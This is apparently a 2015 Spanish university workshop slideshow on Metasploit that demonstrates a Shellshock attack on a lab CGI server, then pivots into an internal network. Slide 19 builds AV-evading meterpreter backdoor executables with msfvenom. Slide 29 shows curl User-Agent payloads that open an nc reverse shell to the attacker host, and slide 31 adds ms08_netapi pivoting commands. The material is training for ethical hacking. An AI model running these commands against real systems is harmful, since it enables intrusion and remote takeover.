Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Metasploit Class: Shellshock Attack

1,694 views

Published on

Mi presentación del Taller Metasploit impartido en la Universidad de Sevilla en las II Jornadas de Seguridad en las Comunicaciones y la Información. Demostración practica de ataque a un servidor con Shellshock y pivoting hacia la red Interna. 9/Junio/2015

  • Be the first to comment

Metasploit Class: Shellshock Attack

  1. 1. II JORNADA DE SEGURIDAD EN LAS COMUNICACIONES Y LA INFORMACIÓN 1 09/Junio 2015 Julián José González Caracuel Consultor Senior de Seguridad de la Información CISA /GCIH /GPEN /ITIL Certified Organiza:
  2. 2. ¿Quién soy? 2 Julian J. González Caracuel Ingeniero de Telecomunicaciones – Esp. Telemática Consultor Senior Seguridad de la Información CISA /GCIH /GPEN /ITIL Certified En sus mas de 10 años de experiencia, ha sido miembro del NVAT (Equipo Nacional de Análisis de Vulnerabilidades) en el Estado Mayor de la Defensa (EMAD), asesor del equipo directivo de Centro de Excelencia CIED de la OTAN en Hoyo de Manzanares, e investigador en el ámbito de los procedimientos y metodologías en entorno a la protección de las Infraestructuras Críticas. Profesor del Modulo de Hacking & Pentesting – Máster de Seguridad TIC – Universidad de Sevilla. Actualmente ejerciendo de Freelance bajo la marca ST2Labs.
  3. 3. La clase de hoy 3 INTRODUCCIÓN LESSON LEARNEDDEMOSTRACIÓN
  4. 4. 4 INTRODUCCIÓN
  5. 5. ¿Qué es Hacking? 5 • Es la actividad donde se pone en práctica tu habilidad para evadir los sistema de protección y acceder a un Sistema. • En éste área se realizan los test de penetración, comprobación del nivel de seguridad de la Organización desde el punto de vista del atacante, buscando vulnerabilidades y la forma de explotarlas. Hacking, es la parte más creativa del artista By Julian J. González
  6. 6. ¿Qué es Hacker Ético? 6 Por supuesto, para convertirse en un Hacker Ético o profesional de la Seguridad de la Información, se deben de obtener los conocimientos suficientes como para ser capaz de comprender la técnicas, manejar las herramientas e interpretar los resultados de éstas. Real Academia Española (RAE) decidió incluir la palabra “hacker” en el diccionario con una al menos curiosa definición: “pirata informático
  7. 7. ¿Qué es Hacker Ético?2 7 • Tipos de Hackers: Black: utilizan sus conocimientos para llevar a cabo “actividades ilegales” Grey: son “ambiguos”, utilizan sus conocimientos tanto para llevar a cabo “actividades ilegales” como legales. White: utilizan sus conocimientos para detectar las debilidades y aplicar la contramedidas necesarias. Son los “Profesionales de la Seguridad”
  8. 8. 8 ¿Por donde empiezo?
  9. 9. Vulnerabilidad vs Exploit 9 Exploit es una pieza de software, fragmento de datos o secuencia de comandos y/o acciones, diseñada para aprovechar la vulnerabilidad y conseguir ejecución de código arbitrario. Vulnerabilidad es el “comportamiento” no esperado en un elemento software, que suelen ser errores de programación y/o diseño de la aplicación o software.
  10. 10. Exploit 10 !! Lo encontré ahora soy el AMO ¡¡¡
  11. 11. METASPLOIT FRAMEWORK 11 • La herramienta más utilizada por los #Pentester y #Ethical Hacking!! • Es una herramienta para el desarrollo y evaluación de vulnerabilidades. ¡¡ Miles de Exploits listos para atacar !! Web: http://www.metasploit.com/ Download: http://www.metasploit.com/download/ Versión: Community (Free)| Express |Professional Framework (source code) Multiplataforma: Linux / Windows / Mac http://www.tenable.com/products/nessus/nessus-download- agreement Incluida en BackTrack Linux | www.kali.org Free Pentesting Linux Distribution
  12. 12. MSF | Arsenal 12 Exploits Payload Aux 1 Interfaz de usuario Modulos Auxiliares: Port Scanning Import vulnerbaility scanning Servers (socks, telnet, ftp…) Launcher Exploit Payload
  13. 13. MSF | Ejemplo 13 Ejemplo: Utilización de msfpayload para generar un ejecutable que habilitará en el equipo donde se ejecute una shell (línea de comandos) remota (conexión con la dirección IP introducida en el campo LHOST) Cambiar LHOST por RHOST
  14. 14. MSF | Meterpreter 14 • Metasploit Interpreter: es un payload (stages) especialmente diseñado por metasploit para ejecutarse dentro de la memoria de un proceso residente. • Se le conoce como Meterpreter, siendo el payload más potente y flexible del que dispone metasploit. • Permite la carga de módulos y scripts adicionales, por lo que aumenta considerablemente la capacidad de este payload. • Actualmente dispone de una versión de meterpreter tanto para Windows como para Linux. >> Hacking Mobile >Ahora Meterpreter también en Android!!!!
  15. 15. MSF | How Works 15 MSF SHELLCODE <-IP:443-> shell remota IP:443 MSF Elemento Vulnerable PAYLOAD: meterpreter/reverse_tcp meterpreter Indirecto (URL, PDF, EXE) - Directo EXPLOIT (PAYLOAD)
  16. 16. MSF | How Works2 16 MSF EXPLOIT (PAYLOAD) Carga en memoria el código arbitrario, el STAGER (bind_tcp / reverse_tcp) Elemento Vulnerable send(STAGES) Bind_tcpPAYLOAD = shell / meterpreter send(STAGES) PAYLOAD = shell / meterpreter reverse_tcp IP:Port IP:Port RHOST RPORT LHOST LPORT listener listener DIRECT / BIND REVERSE / BIND
  17. 17. MSF | Ejemplo 17
  18. 18. MSF | Pivoting 18 PIVOTE TARGET MSF TARGET TARGET
  19. 19. MSFVENOM | Ejemplo 19 root@ST2Labs > msfpayload windows/patchupmeterpreter/reverse_tcp LHOST=192.168.2.105 R | msfencode -e php/base64 -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -b 'xff" -t raw | msfencode -e x86/alpha_mixed -c 1 -t exe -o backdoor4.exe root@ST2Labs > msfvenom -p windows/meterpreter/reverse_ord_tcp -e x86/shikata_ga_nai -b 'x00x20x0ax0d' -i 20 -f exe LHOST=192.168.2.105 > p6.exe Técnicas evasión Antivirus | Encoding https://github.com/Veil-Framework/Veil https://github.com/Veil-Framework/
  20. 20. 20 PRESENTACIÓN DEL CASO SHELLSHOCK ATTACK
  21. 21. Bash < Vulnerable! 21 MILLONES DE DISPOSITIVOS BASADOS EN *NIX EXPUESTOS
  22. 22. CVE – SHELLSHOCK - TIMELINE 22 CVE (Common Vulnerabilities and Exposures) 15DIAS
  23. 23. Exploitable! 23 http://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/the- shellshock-vulnerability-bash-bug
  24. 24. How its Works! 24 env X= ‘ () { :;}; echo Vulnerable ’ bash –c “echo comando legitimo” SMTP HTTP DHCP SIP Etc… Servicios vulnerables:
  25. 25. 25 ESCENARIO SHELLSHOCK ATTACK
  26. 26. Pivoting ! 26 192.168.0.3 WINXP SP3 HTTP SERVER 172.16.0.5 LINUX ATTACKER 10.0.0.50 KALI LINUX OBJETIVO
  27. 27. 27 DEMOSTRACIÓN
  28. 28. 28 ! RESUMEN PASO A PASO! SHELLSHOCK ATTACK
  29. 29. 29 192.168.0.3 WINXP SP3 HTTP SERVER 172.16.0.5 LINUX ATTACKER 10.0.0.50 KALI LINUX 1. SCAN SERVICIOS 2. SCAN SHELLSHOCK 3. COMPROBAR REGLAS FIREWALL nc –lv –p 22 < Lado Server > Check Reglas del Firewall curl -k -H 'User-Agent: () { :;}; /bin/bash -c “echo Bingo!>/dev/tcp/10.0.0.50/22"' http://172.16.0.5/cgi-bin/st2.cgi Shell Inversa curl -k -H 'User-Agent: () { :;}; /bin/bash -c "nc -e /bin/bash 10.0.0.50 22"' http://172.16.0.5/cgi-bin/st2.cgi ATTACK
  30. 30. 30 192.168.0.3 WINXP SP3 HTTP SERVER 172.16.0.5 LINUX ATTACKER 10.0.0.50 KALI LINUX EXPLOIT multi/handler < PAYLAOD= python/meterpreter/reverse_tcp msf> msfvenom –p python/meterpreter/reverse_tcp LHOST=10.0.0.50 LPORT=22
  31. 31. Pivoting ! 31 192.168.0.3 WINXP SP3 HTTP SERVER 172.16.0.5 LINUX ATTACKER 10.0.0.50 KALI LINUX msf> route add 192.168.0.0 255.255.255.0 <sesión-id> msf> use exploit Windows/smb/ms08_netapi / paylaod= windows/meterpreter/bind_tcp
  32. 32. Materia para profundizar 32 66,00 ECTS Teléfono 954487384 Web http://trajano.us.es/seguridadtic Email expertoseguridadtic@trajano.us.es MASTER PROPIO – SEGURIDAD EN LA INFORMACIÓN Y LAS COMUNICACIONES (III EDICIÓN) – 2015/2016
  33. 33. @st2labs @rhodius 33 www.seguridadparatodos.es Julian J Gonzalez ¿Dónde podéis encontrarme? www.st2labs.com about.me/rhodius https://github.com/ST2Labshttps://twitter.com/seguridadxato2

×